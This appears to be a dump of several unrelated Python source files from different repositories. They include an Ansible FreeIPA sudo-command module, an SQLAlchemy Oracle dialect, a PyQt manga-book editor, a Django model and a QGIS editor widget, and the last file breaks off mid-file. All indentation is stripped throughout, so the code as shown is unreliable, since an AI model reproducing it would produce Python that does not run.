output_file.write(log)
output_file.write(separator)
with open(os.path.join(base_dir, 'eventlog')) as f:
output_file.write('\nLogcat Monitor Event Log\n')
output_file.write(f.read())
except:
logger.exception('Unexpected exception')
logger.info('Done.')
sh.flush()
output_file.write('\nLogcat Printer Event Log\n')
output_file.write(log_stringio.getvalue())
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
TheoRettisch/p2pool-giarcoin
|
refs/heads/master
|
wstools/tests/test_wstools.py
|
308
|
#!/usr/bin/env python
############################################################################
# Joshua R. Boverhof, David W. Robertson, LBNL
# See LBNLCopyright for copyright notice!
###########################################################################
import unittest, tarfile, os, ConfigParser
import test_wsdl
SECTION='files'
CONFIG_FILE = 'config.txt'
def extractFiles(section, option):
config = ConfigParser.ConfigParser()
config.read(CONFIG_FILE)
archives = config.get(section, option)
archives = eval(archives)
for file in archives:
tar = tarfile.open(file)
if not os.access(tar.membernames[0], os.R_OK):
for i in tar.getnames():
tar.extract(i)
def makeTestSuite():
suite = unittest.TestSuite()
suite.addTest(test_wsdl.makeTestSuite("services_by_file"))
return suite
def main():
extractFiles(SECTION, 'archives')
unittest.main(defaultTest="makeTestSuite")
if __name__ == "__main__" : main()
|
tchernomax/ansible
|
refs/heads/devel
|
lib/ansible/modules/identity/ipa/ipa_sudocmd.py
|
74
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ipa_sudocmd
author: Thomas Krahn (@Nosmoht)
short_description: Manage FreeIPA sudo command
description:
- Add, modify or delete sudo command within FreeIPA server using FreeIPA API.
options:
sudocmd:
description:
- Sudo Command.
aliases: ['name']
required: true
description:
description:
- A description of this command.
state:
description: State to ensure
default: present
choices: ['present', 'absent', 'enabled', 'disabled']
extends_documentation_fragment: ipa.documentation
version_added: "2.3"
'''
EXAMPLES = '''
# Ensure sudo command exists
- ipa_sudocmd:
name: su
description: Allow to run su via sudo
ipa_host: ipa.example.com
ipa_user: admin
ipa_pass: topsecret
# Ensure sudo command does not exist
- ipa_sudocmd:
name: su
state: absent
ipa_host: ipa.example.com
ipa_user: admin
ipa_pass: topsecret
'''
RETURN = '''
sudocmd:
description: Sudo command as return from IPA API
returned: always
type: dict
'''
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ipa import IPAClient, ipa_argument_spec
from ansible.module_utils._text import to_native
class SudoCmdIPAClient(IPAClient):
def __init__(self, module, host, port, protocol):
super(SudoCmdIPAClient, self).__init__(module, host, port, protocol)
def sudocmd_find(self, name):
return self._post_json(method='sudocmd_find', name=None, item={'all': True, 'sudocmd': name})
def sudocmd_add(self, name, item):
return self._post_json(method='sudocmd_add', name=name, item=item)
def sudocmd_mod(self, name, item):
return self._post_json(method='sudocmd_mod', name=name, item=item)
def sudocmd_del(self, name):
return self._post_json(method='sudocmd_del', name=name)
def get_sudocmd_dict(description=None):
data = {}
if description is not None:
data['description'] = description
return data
def get_sudocmd_diff(client, ipa_sudocmd, module_sudocmd):
return client.get_diff(ipa_data=ipa_sudocmd, module_data=module_sudocmd)
def ensure(module, client):
name = module.params['sudocmd']
state = module.params['state']
module_sudocmd = get_sudocmd_dict(description=module.params['description'])
ipa_sudocmd = client.sudocmd_find(name=name)
changed = False
if state == 'present':
if not ipa_sudocmd:
changed = True
if not module.check_mode:
client.sudocmd_add(name=name, item=module_sudocmd)
else:
diff = get_sudocmd_diff(client, ipa_sudocmd, module_sudocmd)
if len(diff) > 0:
changed = True
if not module.check_mode:
data = {}
for key in diff:
data[key] = module_sudocmd.get(key)
client.sudocmd_mod(name=name, item=data)
else:
if ipa_sudocmd:
changed = True
if not module.check_mode:
client.sudocmd_del(name=name)
return changed, client.sudocmd_find(name=name)
def main():
argument_spec = ipa_argument_spec()
argument_spec.update(description=dict(type='str'),
state=dict(type='str', default='present', choices=['present', 'absent', 'enabled', 'disabled']),
sudocmd=dict(type='str', required=True, aliases=['name']))
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
client = SudoCmdIPAClient(module=module,
host=module.params['ipa_host'],
port=module.params['ipa_port'],
protocol=module.params['ipa_prot'])
try:
client.login(username=module.params['ipa_user'],
password=module.params['ipa_pass'])
changed, sudocmd = ensure(module, client)
module.exit_json(changed=changed, sudocmd=sudocmd)
except Exception as e:
module.fail_json(msg=to_native(e), exception=traceback.format_exc())
if __name__ == '__main__':
main()
|
trmznt/plasmogen
|
refs/heads/master
|
setup.py
|
1
|
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, 'README.md')) as f:
README = f.read()
with open(os.path.join(here, 'CHANGES.md')) as f:
CHANGES = f.read()
requires = [
'pyramid',
'pyramid_chameleon',
'pyramid_debugtoolbar',
'waitress',
'genaf'
]
setup(name='plasmogen',
version='0.01',
description='plasmogen',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pyramid",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='',
author_email='',
url='',
keywords='web pyramid pylons plasmodium genotype',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=requires,
tests_require=requires,
test_suite="plasmogen",
entry_points="""\
[paste.app_factory]
main = plasmogen:main
[console_scripts]
plasmogen-run = plasmogen.scripts.run:main
""",
)
|
kecheon/yablist
|
refs/heads/master
|
simpletext/views.py
|
6027
|
# Create your views here.
|
marcuskelly/recover
|
refs/heads/master
|
Lib/site-packages/sqlalchemy/dialects/oracle/zxjdbc.py
|
33
|
# oracle/zxjdbc.py
# Copyright (C) 2005-2017 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: oracle+zxjdbc
:name: zxJDBC for Jython
:dbapi: zxjdbc
:connectstring: oracle+zxjdbc://user:pass@host/dbname
:driverurl: http://www.oracle.com/technetwork/database/features/jdbc/index-091264.html
.. note:: Jython is not supported by current versions of SQLAlchemy. The
zxjdbc dialect should be considered as experimental.
"""
import decimal
import re
from sqlalchemy import sql, types as sqltypes, util
from sqlalchemy.connectors.zxJDBC import ZxJDBCConnector
from sqlalchemy.dialects.oracle.base import (OracleCompiler,
OracleDialect,
OracleExecutionContext)
from sqlalchemy.engine import result as _result
from sqlalchemy.sql import expression
import collections
SQLException = zxJDBC = None
class _ZxJDBCDate(sqltypes.Date):
def result_processor(self, dialect, coltype):
def process(value):
if value is None:
return None
else:
return value.date()
return process
class _ZxJDBCNumeric(sqltypes.Numeric):
def result_processor(self, dialect, coltype):
# XXX: does the dialect return Decimal or not???
# if it does (in all cases), we could use a None processor as well as
# the to_float generic processor
if self.asdecimal:
def process(value):
if isinstance(value, decimal.Decimal):
return value
else:
return decimal.Decimal(str(value))
else:
def process(value):
if isinstance(value, decimal.Decimal):
return float(value)
else:
return value
return process
class OracleCompiler_zxjdbc(OracleCompiler):
def returning_clause(self, stmt, returning_cols):
self.returning_cols = list(
expression._select_iterables(returning_cols))
# within_columns_clause=False so that labels (foo AS bar) don't render
columns = [self.process(c, within_columns_clause=False)
for c in self.returning_cols]
if not hasattr(self, 'returning_parameters'):
self.returning_parameters = []
binds = []
for i, col in enumerate(self.returning_cols):
dbtype = col.type.dialect_impl(
self.dialect).get_dbapi_type(self.dialect.dbapi)
self.returning_parameters.append((i + 1, dbtype))
bindparam = sql.bindparam(
"ret_%d" % i, value=ReturningParam(dbtype))
self.binds[bindparam.key] = bindparam
binds.append(
self.bindparam_string(self._truncate_bindparam(bindparam)))
return 'RETURNING ' + ', '.join(columns) + " INTO " + ", ".join(binds)
class OracleExecutionContext_zxjdbc(OracleExecutionContext):
def pre_exec(self):
if hasattr(self.compiled, 'returning_parameters'):
# prepare a zxJDBC statement so we can grab its underlying
# OraclePreparedStatement's getReturnResultSet later
self.statement = self.cursor.prepare(self.statement)
def get_result_proxy(self):
if hasattr(self.compiled, 'returning_parameters'):
rrs = None
try:
try:
rrs = self.statement.__statement__.getReturnResultSet()
next(rrs)
except SQLException as sqle:
msg = '%s [SQLCode: %d]' % (
sqle.getMessage(), sqle.getErrorCode())
if sqle.getSQLState() is not None:
msg += ' [SQLState: %s]' % sqle.getSQLState()
raise zxJDBC.Error(msg)
else:
row = tuple(
self.cursor.datahandler.getPyObject(
rrs, index, dbtype)
for index, dbtype in
self.compiled.returning_parameters)
return ReturningResultProxy(self, row)
finally:
if rrs is not None:
try:
rrs.close()
except SQLException:
pass
self.statement.close()
return _result.ResultProxy(self)
def create_cursor(self):
cursor = self._dbapi_connection.cursor()
cursor.datahandler = self.dialect.DataHandler(cursor.datahandler)
return cursor
class ReturningResultProxy(_result.FullyBufferedResultProxy):
"""ResultProxy backed by the RETURNING ResultSet results."""
def __init__(self, context, returning_row):
self._returning_row = returning_row
super(ReturningResultProxy, self).__init__(context)
def _cursor_description(self):
ret = []
for c in self.context.compiled.returning_cols:
if hasattr(c, 'name'):
ret.append((c.name, c.type))
else:
ret.append((c.anon_label, c.type))
return ret
def _buffer_rows(self):
return collections.deque([self._returning_row])
class ReturningParam(object):
"""A bindparam value representing a RETURNING parameter.
Specially handled by OracleReturningDataHandler.
"""
def __init__(self, type):
self.type = type
def __eq__(self, other):
if isinstance(other, ReturningParam):
return self.type == other.type
return NotImplemented
def __ne__(self, other):
if isinstance(other, ReturningParam):
return self.type != other.type
return NotImplemented
def __repr__(self):
kls = self.__class__
return '<%s.%s object at 0x%x type=%s>' % (
kls.__module__, kls.__name__, id(self), self.type)
class OracleDialect_zxjdbc(ZxJDBCConnector, OracleDialect):
jdbc_db_name = 'oracle'
jdbc_driver_name = 'oracle.jdbc.OracleDriver'
statement_compiler = OracleCompiler_zxjdbc
execution_ctx_cls = OracleExecutionContext_zxjdbc
colspecs = util.update_copy(
OracleDialect.colspecs,
{
sqltypes.Date: _ZxJDBCDate,
sqltypes.Numeric: _ZxJDBCNumeric
}
)
def __init__(self, *args, **kwargs):
super(OracleDialect_zxjdbc, self).__init__(*args, **kwargs)
global SQLException, zxJDBC
from java.sql import SQLException
from com.ziclix.python.sql import zxJDBC
from com.ziclix.python.sql.handler import OracleDataHandler
class OracleReturningDataHandler(OracleDataHandler):
"""zxJDBC DataHandler that specially handles ReturningParam."""
def setJDBCObject(self, statement, index, object, dbtype=None):
if type(object) is ReturningParam:
statement.registerReturnParameter(index, object.type)
elif dbtype is None:
OracleDataHandler.setJDBCObject(
self, statement, index, object)
else:
OracleDataHandler.setJDBCObject(
self, statement, index, object, dbtype)
self.DataHandler = OracleReturningDataHandler
def initialize(self, connection):
super(OracleDialect_zxjdbc, self).initialize(connection)
self.implicit_returning = \
connection.connection.driverversion >= '10.2'
def _create_jdbc_url(self, url):
return 'jdbc:oracle:thin:@%s:%s:%s' % (
url.host, url.port or 1521, url.database)
def _get_server_version_info(self, connection):
version = re.search(
r'Release ([\d\.]+)', connection.connection.dbversion).group(1)
return tuple(int(x) for x in version.split('.'))
dialect = OracleDialect_zxjdbc
|
BlackDragonHunt/Mangle
|
refs/heads/master
|
book.py
|
1
|
# Copyright (C) 2010 Alex Yatskov
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from PyQt4 import QtGui, QtCore, QtXml
import image
from image import ImageFlags
from about import DialogAbout
from options import DialogOptions
from convert import DialogConvert
from ui.book_ui import Ui_MainWindowBook
class Book:
DefaultDevice = 'Kindle 3'
DefaultOverwrite = True
DefaultCBZ = False
DefaultImageFlags = ImageFlags.Orient | ImageFlags.Shrink | ImageFlags.Quantize
DefaultsXML = 'defaults.xml'
def __init__(self):
self.images = []
self.filename = None
self.modified = False
self.title = None
self.load_defaults(Book.DefaultsXML)
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# Saves the current settings as the defaults.
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
def save_defaults(self, filename = DefaultsXML):
document = QtXml.QDomDocument()
root = document.createElement('defaults')
document.appendChild(root)
root.setAttribute('overwrite', 'true' if self.overwrite else 'false')
root.setAttribute('device', self.device)
root.setAttribute('orientImages', 'true' if self.imageFlags & ImageFlags.Orient else 'false')
root.setAttribute('shrinkImages', 'true' if self.imageFlags & ImageFlags.Shrink else 'false')
root.setAttribute('frameImages', 'true' if self.imageFlags & ImageFlags.Frame else 'false')
root.setAttribute('ditherImages', 'true' if self.imageFlags & ImageFlags.Quantize else 'false')
root.setAttribute('enlargeImages', 'true' if self.imageFlags & ImageFlags.Enlarge else 'false')
root.setAttribute('splitImages', 'true' if self.imageFlags & ImageFlags.Split else 'false')
root.setAttribute('rightToLeft', 'true' if self.imageFlags & ImageFlags.RightToLeft else 'false')
root.setAttribute('cbz', 'true' if self.cbz else 'false')
textXml = document.toString(4).toUtf8()
try:
fileXml = open(unicode(filename), 'w')
fileXml.write(textXml)
fileXml.close()
except IOError:
raise RuntimeError('Cannot create defaults file %s' % filename)
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# Loads the default settings from a file.
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
def load_defaults(self, filename = DefaultsXML):
try:
fileXml = open(unicode(filename), 'r')
textXml = fileXml.read()
fileXml.close()
except IOError:
self.device = Book.DefaultDevice
self.overwrite = Book.DefaultOverwrite
self.imageFlags = Book.DefaultImageFlags
self.cbz = Book.DefaultCBZ
self.save_defaults(filename)
return
document = QtXml.QDomDocument()
if not document.setContent(QtCore.QString.fromUtf8(textXml)):
raise RuntimeError('Error parsing defaults file %s' % filename)
root = document.documentElement()
if root.tagName() != 'defaults':
raise RuntimeError('Unexpected defaults format in file %s' % filename)
self.overwrite = root.attribute('overwrite', 'true' if Book.DefaultOverwrite else 'false') == 'true'
self.device = root.attribute('device', Book.DefaultDevice)
orient = root.attribute('orientImages', 'true' if Book.DefaultImageFlags & ImageFlags.Orient else 'false') == 'true'
split = root.attribute('splitImages', 'true' if Book.DefaultImageFlags & ImageFlags.Split else 'false') == 'true'
shrink = root.attribute('shrinkImages', 'true' if Book.DefaultImageFlags & ImageFlags.Shrink else 'false') == 'true'
enlarge = root.attribute('enlargeImages', 'true' if Book.DefaultImageFlags & ImageFlags.Enlarge else 'false') == 'true'
frame = root.attribute('frameImages', 'true' if Book.DefaultImageFlags & ImageFlags.Frame else 'false') == 'true'
dither = root.attribute('ditherImages', 'true' if Book.DefaultImageFlags & ImageFlags.Quantize else 'false') == 'true'
rtl = root.attribute('rightToLeft', 'true' if Book.DefaultImageFlags & ImageFlags.RightToLeft else 'false') == 'true'
self.imageFlags = (
(ImageFlags.Orient if orient else 0) |
(ImageFlags.Split if split else 0) |
(ImageFlags.Shrink if shrink else 0) |
(ImageFlags.Enlarge if enlarge else 0) |
(ImageFlags.Frame if frame else 0) |
(ImageFlags.Quantize if dither else 0) |
(ImageFlags.RightToLeft if rtl else 0)
)
self.cbz = root.attribute('cbz', 'true' if Book.DefaultCBZ else 'false') == 'true'
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# Saves the current state to a book file.
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
def save(self, filename):
document = QtXml.QDomDocument()
root = document.createElement('book')
document.appendChild(root)
root.setAttribute('title', self.title)
root.setAttribute('overwrite', 'true' if self.overwrite else 'false')
root.setAttribute('device', self.device)
root.setAttribute('imageFlags', self.imageFlags)
root.setAttribute('cbz', 'true' if self.cbz else 'false')
for filenameImg in self.images:
itemImg = document.createElement('image')
root.appendChild(itemImg)
itemImg.setAttribute('filename', filenameImg)
textXml = document.toString(4).toUtf8()
try:
fileXml = open(unicode(filename), 'w')
fileXml.write(textXml)
fileXml.close()
except IOError:
raise RuntimeError('Cannot create book file %s' % filename)
self.filename = filename
self.modified = False
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
# Loads a book file.
#xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
def load(self, filename):
try:
fileXml = open(unicode(filename), 'r')
textXml = fileXml.read()
fileXml.close()
except IOError:
raise RuntimeError('Cannot open book file %s' % filename)
document = QtXml.QDomDocument()
if not document.setContent(QtCore.QString.fromUtf8(textXml)):
raise RuntimeError('Error parsing book file %s' % filename)
root = document.documentElement()
if root.tagName() != 'book':
raise RuntimeError('Unexpected book format in file %s' % filename)
self.title = root.attribute('title', 'Untitled')
self.overwrite = root.attribute('overwrite', 'true' if Book.DefaultOverwrite else 'false') == 'true'
self.device = root.attribute('device', Book.DefaultDevice)
self.imageFlags = int(root.attribute('imageFlags', str(Book.DefaultImageFlags)))
self.cbz = root.attribute('cbz', 'true' if Book.DefaultCBZ else 'false') == 'true'
self.filename = filename
self.modified = False
self.images = []
items = root.elementsByTagName('image')
if items == None:
return
for i in xrange(0, len(items)):
item = items.at(i).toElement()
if item.hasAttribute('filename'):
self.images.append(item.attribute('filename'))
class MainWindowBook(QtGui.QMainWindow, Ui_MainWindowBook):
def __init__(self, filename=None):
QtGui.QMainWindow.__init__(self)
self.setupUi(self)
self.connect(self.actionFileNew, QtCore.SIGNAL('triggered()'), self.onFileNew)
self.connect(self.actionFileOpen, QtCore.SIGNAL('triggered()'), self.onFileOpen)
self.connect(self.actionFileSave, QtCore.SIGNAL('triggered()'), self.onFileSave)
self.connect(self.actionFileSaveAs, QtCore.SIGNAL('triggered()'), self.onFileSaveAs)
self.connect(self.actionBookOptions, QtCore.SIGNAL('triggered()'), self.onBookOptions)
self.connect(self.actionBookAddFiles, QtCore.SIGNAL('triggered()'), self.onBookAddFiles)
self.connect(self.actionBookAddDirectory, QtCore.SIGNAL('triggered()'), self.onBookAddDirectory)
self.connect(self.actionBookShiftUp, QtCore.SIGNAL('triggered()'), self.onBookShiftUp)
self.connect(self.actionBookShiftDown, QtCore.SIGNAL('triggered()'), self.onBookShiftDown)
self.connect(self.actionBookRemove, QtCore.SIGNAL('triggered()'), self.onBookRemove)
self.connect(self.actionBookExport, QtCore.SIGNAL('triggered()'), self.onBookExport)
self.connect(self.actionHelpAbout, QtCore.SIGNAL('triggered()'), self.onHelpAbout)
self.connect(self.actionHelpHomepage, QtCore.SIGNAL('triggered()'), self.onHelpHomepage)
self.connect(self.listWidgetFiles, QtCore.SIGNAL('customContextMenuRequested(const QPoint&)'), self.onFilesContextMenu)
self.connect(self.listWidgetFiles, QtCore.SIGNAL('itemDoubleClicked (QListWidgetItem *)'), self.onFilesDoubleClick)
self.listWidgetFiles.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
self.book = Book()
if filename != None:
self.loadBook(filename)
self.current_dir = os.getcwd()
def closeEvent(self, event):
if not self.saveIfNeeded():
event.ignore()
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.acceptProposedAction()
def dropEvent(self, event):
directories = []
filenames = []
for url in event.mimeData().urls():
filename = url.toLocalFile()
if self.isImageFile(filename):
filenames.append(filename)
elif os.path.isdir(unicode(filename)):
directories.append(filename)
self.addImageDirs(directories)
self.addImageFiles(filenames)
def onFileNew(self):
if self.saveIfNeeded():
self.book = Book()
self.listWidgetFiles.clear()
def onFileOpen(self):
if not self.saveIfNeeded():
return
filename = QtGui.QFileDialog.getOpenFileName(
self,
'Select a book file to open',
self.current_dir,
'Mangle files (*.mngl);;All files (*.*)'
)
if not filename.isNull():
self.loadBook(self.cleanupBookFile(filename))
# Keep track of wherever they moved to find this file.
self.current_dir = os.path.split(str(filename))[0]
def onFileSave(self):
self.saveBook(False)
def onFileSaveAs(self):
self.saveBook(True)
def onFilesContextMenu(self, point):
menu = QtGui.QMenu(self)
menu.addAction(self.menu_Add.menuAction())
if len(self.listWidgetFiles.selectedItems()) > 0:
menu.addAction(self.menu_Shift.menuAction())
menu.addAction(self.actionBookRemove)
menu.exec_(self.listWidgetFiles.mapToGlobal(point))
def onFilesDoubleClick(self, item):
services = QtGui.QDesktopServices()
services.openUrl(QtCore.QUrl.fromLocalFile(item.text()))
def onBookAddFiles(self):
filenames = QtGui.QFileDialog.getOpenFileNames(
self,
'Select image file(s) to add',
self.current_dir,
'Image files (*.jpeg *.jpg *.gif *.png);;All files (*.*)'
)
if filenames:
self.addImageFiles(filenames)
# Keep track of wherever they moved to find these files.
self.current_dir = os.path.split(str(filenames[0]))[0]
def onBookAddDirectory(self):
directory = QtGui.QFileDialog.getExistingDirectory(self, 'Select an image directory to add', self.current_dir)
if not directory.isNull():
self.addImageDirs([directory])
self.current_dir = str(directory)
def onBookShiftUp(self):
self.shiftImageFiles(-1)
def onBookShiftDown(self):
self.shiftImageFiles(1)
def onBookRemove(self):
self.removeImageFiles()
def onBookOptions(self):
dialog = DialogOptions(self, self.book)
dialog.exec_()
def onBookExport(self):
if len(self.book.images) == 0:
QtGui.QMessageBox.warning(self, 'Mangle', 'This book has no images to export')
return
if self.book.title == None:
dialog = DialogOptions(self, self.book)
if dialog.exec_() == QtGui.QDialog.Rejected:
return
# If exporting to CBZ, this is a filename. If not, this is a directory name.
out_path = ""
if self.book.cbz == False:
out_path = QtGui.QFileDialog.getExistingDirectory(self, 'Select a directory to export book to', self.current_dir)
# Keep track of wherever they moved to find this directory.
self.current_dir = str(out_path)
else:
out_path = QtGui.QFileDialog.getSaveFileName(
self,
'Select image file(s) to add',
# Default to the current directory + the book's title + the cbz extension.
os.path.join(self.current_dir, "%s.cbz" % self.book.title),
'Comic Book Archive File (*.cbz);;All files (*.*)'
)
# Keep track of wherever they moved to find this file.
self.current_dir = os.path.split(str(out_path))[0]
if not out_path.isNull():
dialog = DialogConvert(self, self.book, out_path)
dialog.exec_()
def onHelpHomepage(self):
services = QtGui.QDesktopServices()
services.openUrl(QtCore.QUrl('http://foosoft.net/mangle'))
def onHelpAbout(self):
dialog = DialogAbout(self)
dialog.exec_()
def saveIfNeeded(self):
if not self.book.modified:
return True
result = QtGui.QMessageBox.question(
self,
'Mangle',
'Save changes to the current book?',
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No | QtGui.QMessageBox.Cancel,
QtGui.QMessageBox.Yes
)
return (
result == QtGui.QMessageBox.No or
result == QtGui.QMessageBox.Yes and self.saveBook()
)
def saveBook(self, browse=False):
if self.book.title == None:
QtGui.QMessageBox.warning(self, 'Mangle', 'You must specify a title for this book before saving')
return False
filename = self.book.filename
if filename == None or browse:
filename = QtGui.QFileDialog.getSaveFileName(
self,
'Select a book file to save as',
self.current_dir,
'Mangle files (*.mngl);;All files (*.*)'
)
if filename.isNull():
return False
filename = self.cleanupBookFile(filename)
self.current_dir = os.path.split(str(filename))[0]
try:
self.book.save(filename)
except RuntimeError, error:
QtGui.QMessageBox.critical(self, 'Mangle', str(error))
return False
return True
def loadBook(self, filename):
try:
self.book.load(filename)
except RuntimeError, error:
QtGui.QMessageBox.critical(self, 'Mangle', str(error))
else:
self.listWidgetFiles.clear()
for image in self.book.images:
self.listWidgetFiles.addItem(image)
def shiftImageFile(self, row, delta):
validShift = (
(delta > 0 and row < self.listWidgetFiles.count() - delta) or
(delta < 0 and row >= abs(delta))
)
if not validShift:
return
item = self.listWidgetFiles.takeItem(row)
self.listWidgetFiles.insertItem(row + delta, item)
self.listWidgetFiles.setItemSelected(item, True)
self.book.modified = True
self.book.images[row], self.book.images[row + delta] = (
self.book.images[row + delta], self.book.images[row]
)
def shiftImageFiles(self, delta):
items = self.listWidgetFiles.selectedItems()
rows = sorted([self.listWidgetFiles.row(item) for item in items])
for row in rows if delta < 0 else reversed(rows):
self.shiftImageFile(row, delta)
def removeImageFiles(self):
for item in self.listWidgetFiles.selectedItems():
row = self.listWidgetFiles.row(item)
self.listWidgetFiles.takeItem(row)
self.book.images.remove(item.text())
self.book.modified = True
def addImageFiles(self, filenames):
filenamesListed = []
for i in xrange(0, self.listWidgetFiles.count()):
filenamesListed.append(self.listWidgetFiles.item(i).text())
for filename in filenames:
if filename not in filenamesListed:
filename = QtCore.QString(filename)
self.listWidgetFiles.addItem(filename)
self.book.images.append(filename)
self.book.modified = True
def addImageDirs(self, directories):
filenames = []
for directory in directories:
for root, subdirs, subfiles in os.walk(unicode(directory)):
for filename in subfiles:
path = os.path.join(root, filename)
if self.isImageFile(path):
filenames.append(path)
self.addImageFiles(filenames)
def isImageFile(self, filename):
imageExts = ['.jpeg', '.jpg', '.gif', '.png']
filename = unicode(filename)
return (
os.path.isfile(filename) and
os.path.splitext(filename)[1].lower() in imageExts
)
def cleanupBookFile(self, filename):
if len(os.path.splitext(unicode(filename))[1]) == 0:
filename += '.mngl'
return filename
|
stahlnow/stahlnow
|
refs/heads/master
|
website/apps/projects/models.py
|
1
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.models import User
from django.utils.timezone import now
from django.conf import settings
from projects.managers import PublicManager
from taggit.managers import TaggableManager
from fileupload.models import File
class Category(models.Model):
"""Category model."""
title = models.CharField(_('title'), max_length=100)
slug = models.SlugField(_('slug'), unique=True)
class Meta:
verbose_name = _('category')
verbose_name_plural = _('categories')
db_table = 'project_categories'
ordering = ('title',)
def __unicode__(self):
return u'%s' % self.title
class Project(models.Model):
"""Project model."""
STATUS_CHOICES = (
(1, _('Draft')),
(2, _('Public')),
)
title = models.CharField(_('title'), max_length=200)
slug = models.SlugField(_('slug'), unique_for_date='publish')
author = models.ForeignKey(User)
body = models.TextField(_('body'), )
teaser = models.ForeignKey(File, blank=True, null=True, on_delete=models.SET_NULL)
status = models.IntegerField(_('status'), choices=STATUS_CHOICES, default=2)
allow_comments = models.BooleanField(_('allow comments'), default=True)
publish = models.DateTimeField(_('publish'), default=now)
created = models.DateTimeField(_('created'), auto_now_add=True)
modified = models.DateTimeField(_('modified'), auto_now=True)
category = models.ForeignKey(Category, null=True)
my_order = models.PositiveIntegerField(default=0, blank=False, null=False)
tags = TaggableManager()
objects = PublicManager()
def image_tag(self):
return u'<img src="%s" width="400px" />' % (settings.FILES_URL + self.teaser.file.url)
image_tag.short_description = 'Teaser'
image_tag.allow_tags = True
class Meta:
verbose_name = _('project')
verbose_name_plural = _('projects')
db_table = 'project_projects'
ordering = ('my_order',)
get_latest_by = 'publish'
def __unicode__(self):
return u'%s' % self.title
@models.permalink
def get_absolute_url(self):
return 'project_detail', (), {'slug': self.slug}
def get_next(self):
next = Project.objects.filter(my_order__gt=self.my_order)
if next:
return next.first().get_absolute_url()
return Project.objects.get(my_order=1).get_absolute_url()
def get_previous(self):
prev = Project.objects.filter(my_order__lt=self.my_order).order_by('-my_order')
if prev:
return prev.first().get_absolute_url()
return Project.objects.order_by('-my_order')[0].get_absolute_url()
|
chhao91/QGIS
|
refs/heads/master
|
python/plugins/processing/gui/ScriptEdit.py
|
9
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
ScriptEdit.py
---------------------
Date : April 2013
Copyright : (C) 2013 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'April 2013'
__copyright__ = '(C) 2013, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4.QtCore import Qt, QSettings
from PyQt4.QtGui import QFont, QColor, QShortcut, QKeySequence
from qgis.core import QgsApplication
from PyQt4.Qsci import QsciScintilla, QsciLexerPython, QsciAPIs
from processing.gui.LexerR import LexerR
class ScriptEdit(QsciScintilla):
LEXER_PYTHON = 0
LEXER_R = 1
def __init__(self, parent=None):
QsciScintilla.__init__(self, parent)
self.lexer = None
self.api = None
self.lexerType = -1
self.setCommonOptions()
self.initShortcuts()
def setCommonOptions(self):
# Enable non-ASCII characters
self.setUtf8(True)
# Default font
font = QFont()
font.setFamily('Courier')
font.setFixedPitch(True)
font.setPointSize(20)
self.setFont(font)
self.setMarginsFont(font)
self.initLexer()
self.setBraceMatching(QsciScintilla.SloppyBraceMatch)
self.setWrapMode(QsciScintilla.WrapWord)
self.setWrapVisualFlags(QsciScintilla.WrapFlagByText,
QsciScintilla.WrapFlagNone, 4)
self.setSelectionForegroundColor(QColor('#2e3436'))
self.setSelectionBackgroundColor(QColor('#babdb6'))
# Show line numbers
self.setMarginWidth(1, '000')
self.setMarginLineNumbers(1, True)
self.setMarginsForegroundColor(QColor('#2e3436'))
self.setMarginsBackgroundColor(QColor('#babdb6'))
# Highlight current line
self.setCaretLineVisible(True)
self.setCaretLineBackgroundColor(QColor('#d3d7cf'))
# Folding
self.setFolding(QsciScintilla.BoxedTreeFoldStyle)
